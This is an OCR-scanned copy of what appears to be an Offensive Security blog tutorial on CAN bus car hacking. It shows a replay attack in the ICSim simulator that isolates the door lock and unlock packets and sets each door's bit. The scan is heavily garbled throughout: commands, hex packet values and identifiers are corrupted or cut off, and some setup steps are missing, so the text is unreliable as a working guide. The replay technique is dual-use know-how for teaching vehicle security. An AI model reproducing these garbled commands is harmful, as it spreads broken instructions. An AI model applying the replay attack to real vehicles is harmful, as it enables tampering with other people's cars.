_{https://mwwoffensive-security.com) Q t Buy fr (nttps://mwow.offensive: ‘security.com/pre-reg/) Introduction to Car Hacking: The CAN Bus @ Aug 01, 2022 © Offensive Security (/category/offsec/) ‘Anthony (RedHatAugust) Radzykewycz “ Content Developer Hey Everyone! | am happy to be sharing another blog post about a random hacking topic that many may not know about: Car Hacking! | want to state up front that, while I believe in the validity of this article, itis not the only attack Fin vehicles. | hope this serves as another way to think creatively about how devices and systems can be analyzed in order to gain some insights on how those controls may be used or even abused by an attacker. Despite the general nuance that hacking is coming from an attacking standpoint, there are actually benefits that can be reaped from hacking endeavors. In the case of vehicles, this may be in the form of unlocking certain features in a vehicle, removing limits that existed previously, or helping create new technology that may have a positive result (such as the devices some car insurance companies provide to ensure that a customer can get a ‘good driver’ discount). While these ideas are mentioned here, we won't be going that deep. It also needs to be said that the author nor Offensive Security will not be held liable if you attempt the laid out concepts in this article and it has an adverse result, There can be risk when hacking a vehicle. If you decide to attempt to hack a physical vehicle, do it at your own risk. Fortunately, a virtual option will be covered in this article, to provide exercise opportunities and get some hands-on experience. With that, let's get to it by starting with explaining what in the world a CAN bus is! What is the CAN Bus?The CAN bus (Controller Area Network bus) is a central network that a vehicle communicates with its components. Woo rchiny co > regagst sovhefartahavebeseehigfecban many functions that operate via electrical signals. The car has door locks, a speedometer, a gas gauge, controls for the brakes, controls for the gas pedal, and many, MANY more. Many of these devices all communicate via this network, OBD-II The OBD-II (On-board diagnostics 2) connector is a port on a vehicle that allows for easy.diagegsis of vehicle codes. Many times, when we bring our vehicles to a mechanic, they wll plug a computer device into his port to get the error code the vehicle is sending. This makes for much quicker resolutions for iss ‘on the check-engine light or even issues that don't result in an indicator. ‘Security.com/pre-reg/) These ports are usually very easy to access. They are normally under the dashboard by the pedals, behind the steering column, or even under the dashboard on the passenger side. Here Is a picture of a plug in an OBD-II port: In terms of getting a physical connection to this port, a device such as the CANtact (hites./imww.crowdsupply.com/linklayer-labs/cantact-ara) can be purchased or even made (httns://github.com/linklayer/cantact-hw), Using the physical device will remain out of scope to this article, but the hack covered in this article is the same whether doing this on a physical vehicle or the virtual simulator. The access point to get communication on the CAN bus would be through the OBD-II port: CAN Bus Network Basics In the local CAN bus network, packets are being sent and received very much like a hub. For those of you not familiar with a hub, the data packets can be seen by all devices. | don’t want to get too far into the weeds on this topic, but just know that switches control the sharing of the data packets from one destination to another destination, whereas a hub just sends the packets to everyone on that network device. Hubs are noisy and considered to be an insecure network device due to the ability to eavesdrop on that network. With that, let's consider the door locks - which this article will mainly be focusing on. if we press the lock button on our door, an electrical signal gets sent through the CAN bus to every device on the network, and the doors interpret the data packet. In the data packet, there will be a command: lock or unlock. The doors, receiving the data packet, will take that instruction and execute on the directive in the data packet. Many devices in the vehicle operate in this way, where an action is triggered, data is sent on the network, and the appropriate device takes action with what the data packet designates. Pressing the gas pedal would cause data packets to be sent in the network telling the gas flow to increase, and therefore make the car go faster. This, inturn, may make the speedometer rise to reflect the appropriate speed the vehicle is going, The amount the spi crt. "50 1 dangrd anthesnettsicaes sAny.aorine network, which changes depending on how far the s pedal is pressed. The packets sent on the network are made of two parts: the identifier and the data. The identifier is the representation for the device in the vehicle. The data field represents the instruction to be completed with the said device. Let's take the following example: 120#F289632003200320 Q The beginning section ofthe packets the identifier. n this case, the identifier is 120, The remaining goytion of the packet after the # is the data field. i ‘ebrigecmiasreey Even though we are using this identifier and data segment as an example, itis important to know that the identifier will not be the same between unlike vehicles in year, make, and model, The identifier of 120 may be the gas pedal (accelerator) in a 2019 Konda Civic but the windows in a 2022 Toyota Sienna. With this, we may be able to identify the devices of one vehicle with the identifier tag, but only other vehicles with the same year/make/model will have the same device controlled with that identifier tag value. The last thing to know about the CAN bus is that packets are constantly being sent over this network, so long as any type of power is on the vehicle (meaning the engine does not need to be turned on), the network will be active, What is the Hack? The hack, in this case, is a replay attack on the CAN bus network. We can listen to the packets being sent on the network, manually complete an action (locking/unlocking the doors in our case), and replay the packets back into the network to cause the same action to occur - despite the lock/unlock buttons not being pressed. Before we get into completing this hacking exercise, let's review how to set up the necessary tools to do this in an internal virtual simulator. Setting Up the Tools The following steps are completed on a fresh installation of Kali 2022.2 on VirtualBox. To keep this article to a manageable length, these installations of VirtualBox nor Kali will not be covered. The kal-tweaks utility was also run to change the default two-line output to a single line.There are three tools that we will be installing in this process: * ICSim (Instrument Cluster Simulator) = Socketcand = Kayak First, let's install the prerequisite packages on our Kali machine, kali@kali:~$ sudo apt install 1ibsd12-dev 1ibsd12-image-dev can-utils maven autoconf sudo] password for kali Do you want to continue? [¥/n] ¥ Let's create a “Car_Hacking” directory to work in and enter that directory.i398 cH Document s/cap Hackiny kalifkali:~/Docuneh Lar_Hacking Inside the newly created directory, let’s clone the ICSim Git repository. kali@kali:~/Documents/Car_Hacking$ git clone https://github.con/zonbieCraig/ICSin.git Cloning into 'ICSin" renote: Enumerating objects: 135, done. renote: Counting objects: 100% (5/5), done renote: Compressing objects: 100% (4/4), done. t is renote: Total 135 (delta 1), reused 3 (delta 1), pack-reused 136 ‘security.com/pre-reg/| Receiving objects: 100% (135/135), 1.09 MiB | 2.68 Mi8/s, done. Resolving deltas: 1¢@% (68/68), done. With the ICSim repository cloned into our current working directory, let's enter the ICSim directory and compile the code to make the necessary binary. kali@kali:~/Documents/Car_Hacking$ cd ICSim kali@kali:~/Docunents/Car_Hacking/ICSin$ sudo make gcc -I/usr/include/S0L2 ~-c -0 icsim.o icsim.c gcc -I/usr/include/SDL2 -o icsim icsim.c lib.o -1SDL2 -1SDL2_image Bec -I/usr/include/S0L2 -c -0 controls.o controls.c gcc -T/usr/include/SDL2 -o controls controls.c -1SDL2 -1S0L2_image Let's move back to the Car_Hacking directory and also clone the socketcand repository. kaligkali:~/Docunents/Car_Hacking/ICSim$ cd .. kali@kali:~/Docunents/Car_Hacking$ git clone https://github.con/linux-can/socketcand.git Cloning into 'socketcand remote: Enumerating objects: 923, done. renote: Total 923 (delta @), reused @ (delta @), pack-reused 923 Receiving objects: 100% (923/923), 273.95 KiB | 931.00 KiB/s, done. Resolving deltas: 1¢0% (547/547), done. With the socketcand repository cloned into place, let's configure, compile, and install the package. There isa file that is missing, so welll need to start by copying that file into place. kali@kali:~/Docurents/Car_Hacking$ cd socketcand kali@kali:~/Docunents/Car_Hacking/socketcand$ wget https: //raw. githubusercontent..com/dschanoel https: //raw.githubusercontent . con/dschanoeh/socketcand/master/config-h.in Resolving raw.githubusercontent.con (raw.githubusercontent.com)... 185.199.109.133, 185.199,1: Connecting to raw.githubusercontent.com (raw. githubusercontent.com) |185.199.109.133]:443... co HTTP request sent, awaiting response... 200 OK Length: 3773 (3.7K) [text/plain] Saving to: ‘config.h.in’ config.h. in 100% =>] 368K --.-KB/s in Os 2022-06-06 10:52:38 (80.8 MB/s) - ‘config.h.in? saved [3773/3773] With the header file in place, let's configure the package, compile it, and install it. spliti split splitt > split2 split2 split2 > split3 split3 kali@kali:~/Documents/Car_Hacking/Deno$ head -n 580 split3 > splita 0 i kali@kali:~/Docunents/Car_Hacking/Deno$ canplayer -1 splits security.com/pre-reg/| kaligkali:~/Docunents/Car_Hacking/Deno$ head -n 200 splita > splits kali@kali:~/Docunents/Car_Hacking/Deno$ canplayer -1 splits kali@kali:~/Docunents/Car_Hacking/Deno$ #00ors didn't unlock kali@kali:~/Documents/Car_Hacking/Deno$ tail -n 200 split4 > splits kaligkali:~/Docunents/Car_Hacking/Deno$ canplayer -1 splits kali@kali:~/Documents/Car_Hacking/Deno$ tail -n 100 splits > splite kaligkali:~/Docunents/Car_Hacking/Deno$ canplayer -1 splite kali@kali:~/Documents/Car_Hacking/Deno$ tail -n 100 splits > splite kali@kali:~/Docunents/Car_Hacking/Deno$ canplayer -1 splite kali@kali:~/Documents/Car_Hacking/Deno$ head -n 50 splité > split7 kali@kali:~/Docunents/Car_Hacking/Deno$ canplayer -I split7 kali@kali:~/Documents/Car_Hacking/Deno$ head =n 25 split? > splits kali@kali:~/Docunents/Car_Hacking/Deno$ canplayer -1 splits kaligkali:~/Docunents/Car Hacking/Deno$ #Doors didn't unlock kali@kali:~/Docunents/Car_Hacking/Deno$ tail -n 25 split7 > splits kaligkali:~/Docunents/Car_Hacking/Deno$ canplayer -I split kali@kali:~/Docunents/Car_Hacking/Deno$ tail -n 10 splits > splits kali@kali:~/Docunents/Car_Hacking/Deno$ canplayer -1 split kali@kali:~/Docunents/Car_Hacking/Deno$ #0oors didn't unlock kali@kali:~/Documents/Car_Hacking/Deno$ head -n 10 splits > splits kali@kali:~/Docunents/Car_Hacking/Deno$ canplayer -I split kaligkali:~/Documents/Car_Hacking/Deno$ tail -n 5 split > splitie kali@kali:~/Documents/Car_Hacking/Deno$ canplayer -I splitie kali@kali:~/Docunents/Car_Hacking/Deno$ tail -n 2 spliti@ > splitit kaligkali:~/Documents/Car_Hacking/Deno$ canplayer -1 split kali@kali:~/Docunents/Car_Hacking/Deno$ #000rs didn't unlock kali@kali:~/Documents/Car_Hacking/Deno$ head -n 2 spliti@ > splitit kali@kali:~/Docunents/Car_Hacking/Deno$ canplayer -1 splitia kali@kali:~/Docunents/Car_Hacking/Deno$ #000rs didn't unlock kali@kali:~/Docunents/Car_Hacking/Deno$ cat splitio (1654550641.303@29) vcan@ 17c#ee22000010000030 (1654550641.303046) vcan@ 18E#00007A (165455e641.304¢18) vcan@ 1984eeeeeaa0000 (165455e641.305246) vcan@ 294He4080002CFSAGO2C (2654550641.305260) vean@ 216H0368374522062F The last portion of the network traffic replay took the last 2 of S lines and then the first 2 of the 5 lines. Without either split file working, we can deduce that the middle of ths file is the packet that controls the unlocking of the doors. Let’s not just leave this to a deduction though. Let’s copy this line into its own file, called “doorsUnlock,” and replay that file to observe the behavior. kaligkali:~/Docunents/Car_Hacking/Deno$ echo ‘(165455641.304018) vcan@ 198#@0002800000" > d kali@kali:~/Docunents/Car_Hacking/Deno$ canplayer -I doorsunlockSree ed (hitps://www.offensive-security.com/w ntent/uploads/2022/08/doorsUnlockFile,png) The doors in the IC Simulator unlocked with this single CAN packet. Let's inspect the contents of this packet. (1654550641.304018) VCANO 19B#000000000000 The first highlighted section of the packet is the identifier. This means that the doors are identified with a device marker of the hexadecimal code of 198, The second highlighted portion of the packet is the data. In this case, t data is all set to 0's, so this isn't very helpful for our needs to send the door instruction. This is the reason we also locked the door in the beginning of our process. With the doors identifier known, we can search the original packet capture for that identifier to see what variations to the data portion of the packet exist. Let's execute the grep command on the original file for 198. kali@kali:~/Documents/Car_Hacking/Deno$ grep 198 candump-2022-06-@6_142359.log (1654550641.3q We can ignore the last line that is displayed in the output above, since the identifier doesn't match what we are searching for. The door data packets are changed in the second nibble of the third byte. Let's take the line with the F in the data section and make a new file, called “doorsLock.” Welll then replay that and monitor the IC Simulator window to determine if this packet will lock all of the doors. kali@kali:~/Docunents/Car_Hacking/Deno$ echo *(1654550642.133853) vcan@ 1984900002000" > do} kaligkali:~/Documents/Car_Hacking/Deno$ canplayer -1 doorsLock(https://mmw.offensive-security.com/wp-content/uploads/2022/07/doorsLockFile.ong) The doors are now locked with a single data packet. Analyzing the Data Further We successfully captured and replayed the unlocking and locking of all the car doors through the CAN bus. We can further analyze the data and see if we can control the doors with more granularity than all or nothing. Let's review the two CAN packets again: (1654550641.304018) VCANO 19B#000000000000 (1654550642.133853) VCANO 19B#00000F000000 As we noted before, the data is changed on the second nibble of the third byte. If we break down this nibble down to its binary format, we can represent it ike this: The packet that unlocks all the doors represents that nibble as a 0. The packet that locks all doors represents the nibble as hexadecimal F. Breaking this down into binary gives 16 possible door combinations. Instead of testing all 16 variations, let's try to manually identify which bit controls which door. To do this, we can think of creating 4 more files with the following organization: a | 4] 2 | 1 | Hex | Door 1folo}ojs|? ofifo}lo}la) 2ottpsifh Now, we can create and replay 4 separate files to identify which bit controls which door. The new data packets will look like this, where each will be in its own file: (1654550641.304018) VCANO 19B#000008000000 (1654550642.133853) VCANO 19B#000004000000 . Buy (1654550641.304018) VCANO 19B#0000020000¢Rshemu offensive: (1654550642.133853) VCANO 19B#000001000000 kaligkali:~/Docunents/Car_Hacking/Deno$ echo '(1654550642.133853) vcan® 19B#¢00082@0000" kali@kali:~/Documents/Car_Hacking/Deno$ echo ‘(1654550642.133853) vcan® 198#e0004000000" kali@kali:~/Documents/Car_Hacking/Deno$ echo ‘(1654550642.133853) vcan® 198400002800000" kaligkali:~/Documents/Car_Hacking/Deno$ echo ‘(1654550642.133853) vcan® 198#e000100e000" Replaying each of these doors# files results in the following findings: sa | 4] 2 | 1 | Hex | — door r1}olol]ol|es Rear Passenger 0} 1 | 0) 0 | 4 | Rear Drivers olol:iole2 Front Passenger Front ofojlo iif Drivers(https.//www offensive-security.com/wp-content/uploads/2022/07/frontDrivers.png) Ifwe consider the action of each door, a 1 is the action to lock the door and a 0 is to unlock the door. As such, when we identified our doors, the identified door was given the instruction to lock the door, while the rest were given the instruction to unlock, Now, we can make any variation of the data to lock or unlock doors in the vehicle. Let's take a look at one last example before concluding this article, if we want to lock both the back doors of the vehicle and unlock the front doors, how can we modify the binary in the CAN packet? Rear Rear | Front | Front Passenger | Driver's | Passenger | Driver's 8 4 2 1 | Hex 2 ? 2 ? 2 If an unlock bit is 0, then we can fill the front doors with the value of 0. A value of 1 wil so the outcome would be: Rear Rear | Front | Front Passenger | Driver's | Passenger | Driver's 8 4 2 1 | Hex 1 1 ° o c I result in locking the doors, The binary result of this would be 1(8) + 1(4) + 0(2) + O(1) = 8+4+0+0 = 12, 12 in hexadecimal format is C. This ‘changes our CAN packet to: (1654550641.304018) VCANO 19B#00000C000000 Let's create another file with this packet, and call it “unlockFront.” We can test this packet by replaying it into the network and monitoring the result(httosv//www offensive-security.com/wp-content/uploads/2022/08/unlockFront.ong) We successfully have control of each door and can make any combination of unlocked/locked doors we want. Want to Learn More? ‘AS was credited earlier in this article, a great resource for learning more about car hacking and a deeper dive into the subject is covered in Craig Smith’s book: The Car Hacker's Handbook. If you'd like to get more rea-world experience hacking cars, | would also recommend checking into the Car Hacking Village (https://www.carhackingvillage.com/) community. Some other valuable resources are CSS Electronics (httpsi//mww.csselectronics.com/pages/can-bus-intros-tutorials) and lllmatics (https://llmatics.com/carhacking htm), Conclusion In this article, we were able to define what a CAN bus is, how it plays into vehicular communications, setting up the tools needed to conduct a simulation, and controlling each individual door in the virtual vehicle to send the unlock or lock command. Car hacking can be a bit of a risk, so we recommend exercising this knowledge either in a simulated environment or with caution. When | attempted to do this on my personal vehicle, | was stranded for 4 hours and ended up being late for an appointment | had... | won't lie to you, It was a terrifying experience that caused a lot of sweat. Fortunately, there weren't any negative long term effects, but tinkering with your primary mode of transportation may not be the most ideal situation if something goes wrong. There are also unintended actions that could result ina stray identifier being sent - such as deploying the airbags. If you decide to take on trying to hack a real vehicle, please be sure to account for any possibility, and do so at your own risk. Thank you so much for taking the time to check out this article, | hope you found it interesting and possibly can use this to spark new creative approaches when doing analysis of the unknownr _{https://mww.offensive-security.com) References » Kal Linux (https. kal org/- The most advanced penetration testing distribution » CANtact Pro (hites//unw.crovdsypnly.comMlinklayer-labs/cantac:pr0) An open source tool for talking to Controller Area Network (CAN) devices » CANtoct HW htips://pthub com Minklayer/cantacthw)- The hardware design files for the CANKact tool » [CSim (hts//ithub.com/zombieCraig/ACSim) - Instrument Cluster Simulator Q » socketcand (hsps/ithub comlinux-can/socketcand)- Server to access CAN sockets over ASCII provommly » Cor Hacking Village (httos/vwn.corhackingvillage.com/ - Great community of car hackef patpeiivnuna. offensive: » CSS Electronics (htps:/Anuw.cselectronics.com/pages/can-bus-ntrs-tutarials)- CANbus into tutorials » lllmatics (https://llmatics.com/carhacking.htm)) ~ Resource for tools and information ABOUT THE AUTHOR, Anthony (RedHatAugust) Radzykewycz Content Developer Passionate about learning and sharing knowledge, Anthony Radzykewycz (AKA RedHatAugust) grows others surrounding him at every opportunity. Currently, his full-time role is as a Content Developer with Offensive Security. He also teaches part-time as an adjunct professor at GateWay Community College, where he is the Linux Program Lead Instructor and paves the way for the Cybersecurity Program. With heartfelt belief that learning comes from doing, Anthony has been committed to interactive learning where the goo! is not to repeat terms and regurgitate, but to get your hands on a keyboard and prove your skills. With this in mind, Anthony competes regularly at his local security conference, “CactusCon." He also competes in various events at DEFCON. Excited about networking, he is always looking to expand relationships across the community If you'd like to get in contact with Anthony, you can message him on Twitter (@RedHatAugust) or e-mail him at [email protected] (mailto:[email protected]), SHARE: W (httos://twitter.com/intent/tweet?reegclytrrtuctionsto+Cart Hacking 2043+ The+CAN+Susurl-httos%638%7F%7Ewww offensive seuuflnitpsid(wnmntienshersesdtibiconn-car-hacking-the-can-busi26) Ki (auttps./Awww facebook.com/sharer/sharer php2u=httns%3A%2F%2Fwww offensive. security.com2Foffsect#2Fintroduction-to-car-hacking-the-can-bus%2F) 3A%2F%42 Fwww.offensive-security,com42Foff bus!42Fatitle=Introduction+to+Car+Hacking3A+The+CAN+Bus) OffSec.&body=Check out this story from OffSec: https%3A%2F%2Ffanyv88.com%3A443%2Fhttps%2Fuww.offensive- ministrue&url=http: i tipsy/vvwulinkedin.com/shareArticle? 2Fintroduction-t.car-hacking.the-can: & (mailto:?subject=Check out this story from ‘security. com*%?Foffsec%?Fintroduction-to-car-hacking-the-can-bus%2F) 111 Tips For Beefing Up Vour Resume And Getting A Job In Cybersecurity (https //wwy offen BU a ssurycomfse/ereareyounsesume fora.qberseci ob a ‘com/pre-reg/) PREVIOUS POST NEXT POST-> =a OSCP Bonus Points Update: Sunsetting PEN-200 Legacy Course Exercises and a New Way to Achieve Points! (httpsv//www.offensive-security.com/offsec/sunsetting TRAINING (HTTPS://WWW.OFFENSIVE- SECURITY.COM/COURSES- AND-CERTIFICATIONS/) Courses and Certifications (https://www.offensive- security.com/courses-and- certifications/) Learn Subscriptions (https://www.offensive- security.com/learn/) Product Pricing (https:/wwwoffensive- security.com/pricing) SECURITY SERVICES Offsec for Orgs (https:/mww.offensive- security.com/offsec-for-orgs/) offSec Federal (https:/ www. offensive- security.com/federal/) OffSec for Education (httpsv/www.offensive- security.com/offsec-for-education/) Penetration Testing Services (https://www.offensive- security.com/penetration-testing/) PROVING GROUNDS (HOSTED LABS) (HTTPS://WWW.OFFENSIVE- SECURITY.COM/LABS/) Proving Grounds Play and Practice (https://www.offensive- security.com/labs/individual/) Proving Grounds for Teams and Orgs (https://www.offensive- security.com/labs/enterprise/) User-Generated Content (htepsv/www.offensive- security.com/labs/submit/) GLOBAL PARTNERS (HTTPS://WWW.OFFENSIVE- SECURITY.COM/TRAINING- PARTNERS/) Work with a Partner (https://www.offensive- security.com/training-partners/for- students/) Partner with OffSec (https:/www.offensive- security.com/training, partners/for- partners/) Education Partners (https://www.offensive- security.com/training- partners/education-partners/) Learning Partners (https://www.offensive- security.com/training- 1en-200-legacy-topic-exercises/) KALI AND COMMUNITY (HTTPS://WWW.OFFENSIVE- SECURITY.COM/COMMUNITY- PROJECTS/) Kali Linux Downloads (https://www.kali.org/get-kali/) offSec Community (https:/portal.offensive- security.com/sign-up/community) Official OffSec Discord (https:/offs.ec/discord) RESOURCES Blog (https:/mww.offensive- security.com/blog/) FAQ (https://help.offensive- security.com/hclen-us) Careers (httpsi/wwn offensive security.com/careers/) offSec Webinars (https:/mww.offensive- security.com/webinars/) Offsec Podcast (https:/mww.offensive- security.com/podcast/) Join Our Email List (https:/learn.offensive- security.com/subscribe-newsletter)partners/learning-partners/) {https://www.déhearanel Bactnagscom) (https://waw.offensive- security.com/training- partners/channel-partners/) Partner Portal (https://offensive- security force.com/partnerportal/s/login/) ABOUT OFFSEC Register for @ Course thtps:/ammmcoffensve secur camps A (HTTPS://WWW.OFFENSIVE- SECURITY.COM/WHY- OFFSEC/) Leadership Team (https:/www.offensive- security.com/leadership-team/) Press Room (https://www.offensive- security.com/press-room) Our Core Values (https://www.offensive- security.com/values/) Bug Bounty Program (htepsv/www.offensive- security.com/bug-bounty-program/) Contact Us (https://www. offensive- security.com/contact-us/) ©2054 oniine. join our growing community, (https://discord.com/invite/offsec), a (https://twitter.com/offsectraining) a (https:/Awww.facebook.com/offsec/) o (http://www, linkedin,com/company/offensive- security) @ (https:/Awww.instagram,com/offsectraining/) o (https:/Awww.youtube,com/channel/UChYZspiz61SeGOolX6cMoAA) o (https://www. twitch tv/offsecofficial) © offsec Services Limited 2022 Alrights reserved Feedback (hepsi offensive security com/contact-us) Legal htpsi/wawrolfensivesecurty.comegatdocs!) Official offsec Swag (https:/fhackerwarehouse.com/couture/ security/) Q ” i . ‘com/pi SS Feed fees)